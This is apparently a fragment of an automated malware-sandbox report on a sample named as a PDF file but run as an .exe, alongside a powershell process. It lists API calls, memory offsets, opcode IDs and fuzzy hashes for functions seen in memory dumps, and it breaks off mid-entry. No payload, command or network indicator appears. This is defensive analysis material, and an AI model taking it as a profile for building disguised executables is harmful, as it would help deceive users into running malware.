Instruction Fuzzy Hash: F741D1B0D00619CEDB24CFAAC884ADDBBB5BF49304F6481AAD408BB255DB756949CF90

Function 027C4248 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 027C59C9

Memory Dump Source

Source File: 00000000.00000002.4130408711.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27c0000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 84596980f744b66c6f4a7907c3edfd6559b0d2d5c4c8c98f987b4778ae4e3fe8
Instruction ID: aa6bcae37750c86a87754b5792ce16c4007954073be2a5b455c93b5de9429c49
Opcode Fuzzy Hash: 84596980f744b66c6f4a7907c3edfd6559b0d2d5c4c8c98f987b4778ae4e3fe8
Instruction Fuzzy Hash: 9E41B3B0D00619CBDB24DFA9C88469DBBB5BF49304F648059D408BB255DB756945CF90

Function 04DD4050 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04DD4111

Memory Dump Source

Source File: 00000000.00000002.4156877688.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4dd0000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: c71ecb280af88162914a166f831ef8971a67cc3580e45c9e1f0570e5b09dc419
Instruction ID: b7fa8ff0368a7fd10ad3da0e9f8f62e2bd7ebcfb24caa2fb1b9339abb51be5c0
Opcode Fuzzy Hash: c71ecb280af88162914a166f831ef8971a67cc3580e45c9e1f0570e5b09dc419
Instruction Fuzzy Hash: C44149B8A00309DFDB14CF99C848AAABBF5FB88314F24C459D519AB321D774A841CFA0

Function 06CE3708 Relevance: 1.6, APIs: 1, Instructions: 77
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageW.USER32(?,?,?,?), ref: 06CE37BD

Memory Dump Source

Source File: 00000000.00000002.4163795521.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce0000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 453ea634ce390e6ae95beb1178fe560fe25f907e308b368c7610669397242a47
Instruction ID: 946e0d1e862b3d1a93a9cb0bb62500a06478e1e087712d781d908d7d8e9e7c1e
Opcode Fuzzy Hash: 453ea634ce390e6ae95beb1178fe560fe25f907e308b368c7610669397242a47
Instruction Fuzzy Hash: 6B2157B6A00248DFCB10DFA9D584ADEBFF4EF48310F24845AE459A7751C734A980CFA4

Function 06CE5271 Relevance: 1.6, APIs: 1, Instructions: 66
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,?,?,?), ref: 06CE52FD

Memory Dump Source

Source File: 00000000.00000002.4163795521.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce0000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 655ea99624b65297b67b0f576c856f6311a175a7cebef82cb9cae5714ba3ba95
Instruction ID: e34f98cadeba52aea24bef0b67a54f2701063f2081950bb569222311b49b93f3
Opcode Fuzzy Hash: 655ea99624b65297b67b0f576c856f6311a175a7cebef82cb9cae5714ba3ba95
Instruction Fuzzy Hash: 3B2164B68003488FDB10CFA9C985BDEBFF8EF19320F14845AD854A7251C338AA44CFA1

Function 027CB730 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,027CD5E6,?,?,?,?,?), ref: 027CD6A7

Memory Dump Source

Source File: 00000000.00000002.4130408711.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27c0000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: db197e10da080a7c32ffca42a331be688c3c1812cd1f3717a59c174d2ad283b1
Instruction ID: df910aa3cec81967903e26c2922bf332f40b319ee059e75a9ec52102c017c39c
Opcode Fuzzy Hash: db197e10da080a7c32ffca42a331be688c3c1812cd1f3717a59c174d2ad283b1
Instruction Fuzzy Hash: 1521E5B5900208AFDB10DFAAD584ADEBBF4EB48310F14806AE958B7310D374A940CFA5

Function 027CD619 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,027CD5E6,?,?,?,?,?), ref: 027CD6A7

Memory Dump Source

Source File: 00000000.00000002.4130408711.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27c0000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a9a4895def99db74e4aa7d63b6d3969c0a01e98f8a63d3605a08140952a62804
Instruction ID: cba9883d853375b6c67b30effdd47ca199b619d15a057cf182c45d48a4e4fdfa
Opcode Fuzzy Hash: a9a4895def99db74e4aa7d63b6d3969c0a01e98f8a63d3605a08140952a62804
Instruction Fuzzy Hash: B321E4B59002589FDB10CFAAD584ADEBFF4EB48314F24802AE958B7310C374A944CFA4

Function 06CEE960 Relevance: 1.6, APIs: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,?,?,?), ref: 06CEE9D0

Memory Dump Source

Source File: 00000000.00000002.4163795521.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce0000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: ce920a6a8cfea58ab3beae3b9439aafaa8d31312cc64c2beae29b0d1f3121afc
Instruction ID: df12c139d67aff3966833f68a30fc6b03069209cfda32855fe67e54cb9a8a970
Opcode Fuzzy Hash: ce920a6a8cfea58ab3beae3b9439aafaa8d31312cc64c2beae29b0d1f3121afc
Instruction Fuzzy Hash: B22168B5C04349DFDB10DF9AD844ADEBBF4EB09354F10802AE994A7351C378A944CFA1

Function 06CE1561 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 06CE15D2

Memory Dump Source

Source File: 00000000.00000002.4163795521.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce0000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 5f0789267bb9dd2caafd6affd562006da4bde74b35236e1db7fffe00937ca962
Instruction ID: fe93ecbf731c124bd175f10d1ad1457c1b18b4a030a4e2c31f3f0121e72e4b47
Opcode Fuzzy Hash: 5f0789267bb9dd2caafd6affd562006da4bde74b35236e1db7fffe00937ca962
Instruction Fuzzy Hash: B41103B6D007098FDB14CF9AC544BEEBBF4AB48320F14C42AD859A7650D738A645CFA5

Function 06CE1568 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 06CE15D2

Memory Dump Source

Source File: 00000000.00000002.4163795521.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce0000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: a6a6080e65b023e9f47876fcb9d76c7c81ea0801c65135d68a39b3cde8c89f0d
Instruction ID: cab215ef0322debf895d6836f65218f92c0cb62a8dbad89804ffb4e1ddce97ae
Opcode Fuzzy Hash: a6a6080e65b023e9f47876fcb9d76c7c81ea0801c65135d68a39b3cde8c89f0d
Instruction Fuzzy Hash: F31114B6C002498FDB10CF9AC444ADEFBF4EB88320F14C02AD859A7650D738A645CFA1

Function 06CEE968 Relevance: 1.6, APIs: 1, Instructions: 52windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,?,?,?), ref: 06CEE9D0

Memory Dump Source

Source File: 00000000.00000002.4163795521.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce0000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: 4c82b9e26b7e2cbeedf0644831e4f2d7331e6aa426703042a8e02aea700427b6
Instruction ID: 4bf6da5e5eea87dcc5f694753a8c3f345cbd2a4008851d699433710bf08c2a20
Opcode Fuzzy Hash: 4c82b9e26b7e2cbeedf0644831e4f2d7331e6aa426703042a8e02aea700427b6
Instruction Fuzzy Hash: 9E11F6B5C002499FDB10CF9AD844BDEBBF8EB48360F10842AE558A3251C378A944CFA5

Function 06CE52A0 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 06CE52FD

Memory Dump Source

Source File: 00000000.00000002.4163795521.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce0000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 5322bfb8e0093fbc0e44e3c0565f4144ea9b3e3ed873ad9e9f7ede2b7f6bbb97
Instruction ID: 33cc5e6f645c4e7a5907bcd396481c67e7d353a8b073fd03542894a70c546694
Opcode Fuzzy Hash: 5322bfb8e0093fbc0e44e3c0565f4144ea9b3e3ed873ad9e9f7ede2b7f6bbb97
Instruction Fuzzy Hash: 991106B5800349DFDB10CF9AC945BEEFBF8EB58324F108419E554A3251D379A984CFA5

Function 027CAF38 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 027CAF9E

Memory Dump Source

Source File: 00000000.00000002.4130408711.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27c0000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: fe6250a91f3c4f27ecabc0aa7e9439d149b68d5b2bc186af726f09949b320ff9
Instruction ID: 9c04970e71d1b5743996696ece5fa7d422ce36ecae7f69510f1f1d2467c809e3
Opcode Fuzzy Hash: fe6250a91f3c4f27ecabc0aa7e9439d149b68d5b2bc186af726f09949b320ff9
Instruction Fuzzy Hash: AF11E0B6D007498FCB10CFAAD544ADEFBF4AB89324F20846ED859B7210C379A545CFA5

Function 06CE009C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000018,00000001,?), ref: 06CE1B9D

Memory Dump Source

Source File: 00000000.00000002.4163795521.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce0000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 907ee53902fa66efc61bf13ab49b42838fba2ff5d8506590248f6361674b5d26
Instruction ID: d2e7a616bc06966b064bb81906996d6acd88687cd030247b671b6643f8314689
Opcode Fuzzy Hash: 907ee53902fa66efc61bf13ab49b42838fba2ff5d8506590248f6361674b5d26
Instruction Fuzzy Hash: 581122B58003489FDB10DF8AC884BEEBBF8EB48320F108419E918A7710D374A980CFA1

Function 06CE5558 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06CE6C3D

Memory Dump Source

Source File: 00000000.00000002.4163795521.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce0000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 72febcdf948ad7ac02a593a090b652d08c61eed22587c5d739835f0c4fdbbc15
Instruction ID: cc7672285449728b943133ef56f36ee5d33599c6e95cf5cf7b4ec72d2f664164
Opcode Fuzzy Hash: 72febcdf948ad7ac02a593a090b652d08c61eed22587c5d739835f0c4fdbbc15
Instruction Fuzzy Hash: 4C1103B59007488FDB20DF9AD544BDEBBF4EB58324F108459D518A7210D374A944CFA5

Function 06CE1B38 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000018,00000001,?), ref: 06CE1B9D

Memory Dump Source

Source File: 00000000.00000002.4163795521.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce0000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5b12bb038dc5d61b797fe68e2bad3e8ecb8c0bcc3bfae6ac4744bd082d4f2aac
Instruction ID: 5d107a08237a5b5872b1cb1102727ab5da67be056ed619c6b094a84cd921a0fa
Opcode Fuzzy Hash: 5b12bb038dc5d61b797fe68e2bad3e8ecb8c0bcc3bfae6ac4744bd082d4f2aac
Instruction Fuzzy Hash: 9F11F2B68003099FDB10CF99D985BDEFBF8EB48320F14841AD558A7750D375A644CFA1

Function 06CEF100 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32 ref: 06CEF165

Memory Dump Source

Source File: 00000000.00000002.4163795521.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce0000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 88807ff4a989e1f6e0c9dd90b4cae603703712f525a79e6fb6ba38223830619c
Instruction ID: 7208057ac778f72db533b8669293329ce1cfc99071473842f280e766669d8116
Opcode Fuzzy Hash: 88807ff4a989e1f6e0c9dd90b4cae603703712f525a79e6fb6ba38223830619c
Instruction Fuzzy Hash: 8C11FEB5C007498FCB20CF9AD844BDEFBF4EB48324F10842AD469A7250C378A545CFA5

Function 06CEF108 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32 ref: 06CEF165

Memory Dump Source

Source File: 00000000.00000002.4163795521.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce0000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 7aa60c5f57d64c0ec3c3e657668a6428a4d715edc5b8b7c362a2df87767a211b
Instruction ID: f5f13d1b24be25fca749bac57f1b9ef7ede37a9201f2ad96dd5e7542d745e3b1
Opcode Fuzzy Hash: 7aa60c5f57d64c0ec3c3e657668a6428a4d715edc5b8b7c362a2df87767a211b
Instruction Fuzzy Hash: F011DDB5C007498FCB20DF9AD884BDEFBF4EB48324F10852AD469A7250D378A544CFA5

Function 06CE6BE1 Relevance: 1.5, APIs: 1, Instructions: 42comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06CE6C3D

Memory Dump Source

Source File: 00000000.00000002.4163795521.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce0000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: bc91c81a4fc4d1f27bad46321632aed9add4ae2238267df5a57cd5119571697c
Instruction ID: f4cd705d13f37fa9dc6013af8b03012398fb6e5d81cad19ae4b7185b323bab22
Opcode Fuzzy Hash: bc91c81a4fc4d1f27bad46321632aed9add4ae2238267df5a57cd5119571697c
Instruction Fuzzy Hash: 95111EB5D003088FCB20DF9AD589BDEBBF4EB48324F20845AD558A7210D338A944CFA5

Function 00D3D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4129430071.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d3d000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8e997f4aad66f224e8f9822ff0168e20ff80a2cb4032318d2dfd35e5609ac03
Instruction ID: 3495780448f1b9d103e07fa9cf003570ec7ed1b3172206a02459f91b13f6ca12
Opcode Fuzzy Hash: c8e997f4aad66f224e8f9822ff0168e20ff80a2cb4032318d2dfd35e5609ac03
Instruction Fuzzy Hash: 6221F271604200DFCB18DF24E9C4B26BBA6FB84B14F24C569E84A4B296C33AD847CE71

Function 00D3D2BC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4129430071.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d3d000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a28b4d6c781823e10800750d60aa91218fce7ef7cf85caf28d05e9e47d62af6
Instruction ID: 3b81af6a49f933683171fd159f35681898947d21ef5da91d020299570a635f54
Opcode Fuzzy Hash: 3a28b4d6c781823e10800750d60aa91218fce7ef7cf85caf28d05e9e47d62af6
Instruction Fuzzy Hash: E8212775504244DFDB01DF14E9C4B2ABBA6FB94324F38C569D8494B255C33ADC4ACEB2

Function 00D3D005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4129430071.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d3d000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95ac6d0dc8eb2c75a54d6852d1e7326e35dfe14183acd1198f256566a000812c
Instruction ID: 562eccace7cee81d836d535df05c066562d9381761c3c86edafd71c71cbbd056
Opcode Fuzzy Hash: 95ac6d0dc8eb2c75a54d6852d1e7326e35dfe14183acd1198f256566a000812c
Instruction Fuzzy Hash: C02180755093808FCB06CF24D994715BF72EB46314F28C5EAD8498F2A7C33A980ACB62

Function 00D3D2B7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4129430071.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d3d000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
Instruction ID: 1c3d8f74acb74191cdf89c669544ede57bc0218e78b32499d5286649e8b479c8
Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
Instruction Fuzzy Hash: AA11B675504240CFDB11CF14D5C4719FF62FB84314F28C5A9D8494B656C33AD80ACFA2

Non-executed Functions

Function 04DD0040 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4156877688.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4dd0000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3deccbebf5b79f07d76899c8ad666f75e9eb3ec684e47cedacc8dd770a7f1e70
Instruction ID: 08112f57f4d719d6bda2486fd85127219bcf677f9a0391e53f659458242c53ed
Opcode Fuzzy Hash: 3deccbebf5b79f07d76899c8ad666f75e9eb3ec684e47cedacc8dd770a7f1e70
Instruction Fuzzy Hash: 0B1274B0C8174ECADB10CF66E99C18D7BB1B78931CBD0CA09D2615E2E1DBB4156ACF64

Function 027CD304 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130408711.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27c0000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2412ea45c6bf047a43b13d45e42b5c46666b30399e060b7f036fddcc1156b74
Instruction ID: 7735e0346be2c0358a1ea8171c963e8194261de0acf8f5172828a916da6285e8
Opcode Fuzzy Hash: a2412ea45c6bf047a43b13d45e42b5c46666b30399e060b7f036fddcc1156b74
Instruction Fuzzy Hash: 19A14936E002198FCF15DFB4C84459EBBB3BF89304B25856EE901AB265DB31E956CB40

Function 04DD0007 Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4156877688.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4dd0000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ca7ab4ef3b71fe620c0ee61d819831f9d06f8f8284b2282071360d7a9bd66d4
Instruction ID: 0e284c9b12eef2dcf27d24f1dc159c292c97427ab7bdd18240a87f10c2428530
Opcode Fuzzy Hash: 0ca7ab4ef3b71fe620c0ee61d819831f9d06f8f8284b2282071360d7a9bd66d4
Instruction Fuzzy Hash: B3C10DB0C8174ACBDB11CF26E89818D7B71BB8931CB95CB09D2616F2E1DBB41466CF64

Analysis Process: powershell.exePID: 3260, Parent PID: 4268COMMON

Executed Functions

Function 036C6CC3 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1696474068.00000000036C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_36c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b16141c25f773b648838e718422753182216d1daef7082756ae473c1122b2a7
Instruction ID: e2757ee72c7d29b0617f174287cc0cdc0acb0d801e905eca7a18dcfbcaceb828
Opcode Fuzzy Hash: 8b16141c25f773b648838e718422753182216d1daef7082756ae473c1122b2a7
Instruction Fuzzy Hash: D4417334A04248DFCB05DFA5D590AADBBB2FF89300F2880A9E944AB361DB35ED55CB50

Function 036C29F0 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1696474068.00000000036C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_36c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 539b2cb43c7cb8a48beb45702b9b492c08e7fcecb9c34747743d66541a24a823
Instruction ID: 9737c69f7590e4715417503684007d69e49cc13e7cd7bb1ee73e97739f69c4b6
Opcode Fuzzy Hash: 539b2cb43c7cb8a48beb45702b9b492c08e7fcecb9c34747743d66541a24a823
Instruction Fuzzy Hash: DB916B74A002458FCB15CF9DC5949BAFBB1FF49310B2489A9D815AB365C736FC51CBA0

Function 036C2B01 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1696474068.00000000036C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_36c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c89e38ef63df8f20ac7595e728217714aedf5207adb7e2cdfab2f1c06122612a
Instruction ID: 38a444f03433e83d7f9b809eb50760fa1efe28b0ed0e3de84db99b1a8fcf0d39
Opcode Fuzzy Hash: c89e38ef63df8f20ac7595e728217714aedf5207adb7e2cdfab2f1c06122612a
Instruction Fuzzy Hash: 874139B4A105458FCB09CF58C5A89BAFBB1FF48314B1586A9D815AB364C736FC51CFA0

Function 036C2C85 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1696474068.00000000036C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_36c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52b32c78843e2b10180bcd26d85e8fd85655dabc9eedaac0832264715bc8dbcf
Instruction ID: b4d36fba470abe07eeb536edc4d7d892ce1068748467c58f03cd7f4f096d6c7b
Opcode Fuzzy Hash: 52b32c78843e2b10180bcd26d85e8fd85655dabc9eedaac0832264715bc8dbcf
Instruction Fuzzy Hash: 4B11042295E3E25FEB03AB78A8700E57FB09E4326470A05E7C0D0CF0B3D5198A5DC3A6

Function 0365D005 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1696098473.000000000365D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0365D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_365d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46801985e10fd5cf560db405e5b2971cde963cfa5d9e12d908e5c76f6e742846
Instruction ID: bf0a1acf97712fa1f85f20246acd688ff69fc6d7ab8ef4b71290bbbb55c60bc5
Opcode Fuzzy Hash: 46801985e10fd5cf560db405e5b2971cde963cfa5d9e12d908e5c76f6e742846
Instruction Fuzzy Hash: 5C01176240D3C4AFD7128A258994652BFA8EF43224F1984DBE8888F2A7D2699C45C772

Function 0365D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1696098473.000000000365D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0365D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_365d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e762706dcedf4067ce3074cb67ef30b536aa3cdf9f7395dfbc5588aeaf20e91
Instruction ID: a37b057b8c80d26d138825b1a0c200c17d685981a05eead9bdbba3fc2df7b018
Opcode Fuzzy Hash: 2e762706dcedf4067ce3074cb67ef30b536aa3cdf9f7395dfbc5588aeaf20e91
Instruction Fuzzy Hash: 4101A272409344AAE710CE29CA84B67FF98EF45324F1CC57AFD484A2C6C6799882C6B1

Function 036C2C75 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1696474068.00000000036C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_36c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 936d3a15e004d9a542113f369e6ee5d92adb7d41100427eb4b60793bce99b0cf
Instruction ID: 2f0b6454e13c555ad79757c93fec8ae467d41c819220e1ae22f6c5b407847c84
Opcode Fuzzy Hash: 936d3a15e004d9a542113f369e6ee5d92adb7d41100427eb4b60793bce99b0cf
Instruction Fuzzy Hash: D0F0A431A041449FCB02CF98D860AEDFB71FF49320F244196D455A72A1C337AD12CB60

Analysis Process: PDF-3093900299039 pdf.exePID: 7088, Parent PID: 4268COMMON

Execution Graph

Execution Coverage:	12.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	169
Total number of Limit Nodes:	10

Executed Functions

Function 0761D128 Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 555
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCapture.USER32 ref: 0761D27E
GetActiveWindow.USER32 ref: 0761D2F6

Strings

Hbq, xrefs: 0761D5E5
Hbq, xrefs: 0761D69F

Memory Dump Source

Source File: 00000003.00000002.4181157256.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7610000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: ActiveCaptureWindow
String ID: Hbq$Hbq
API String ID: 2424615356-4258043069
Opcode ID: e39a3c4bae11ae0279f65c786a4cdce0cad6b46bddf0ed6eb938906ad6837b0b
Instruction ID: 4c5c34da9558b4b810721d50332606dfb142945e108c64b04d26e26aa9890c91
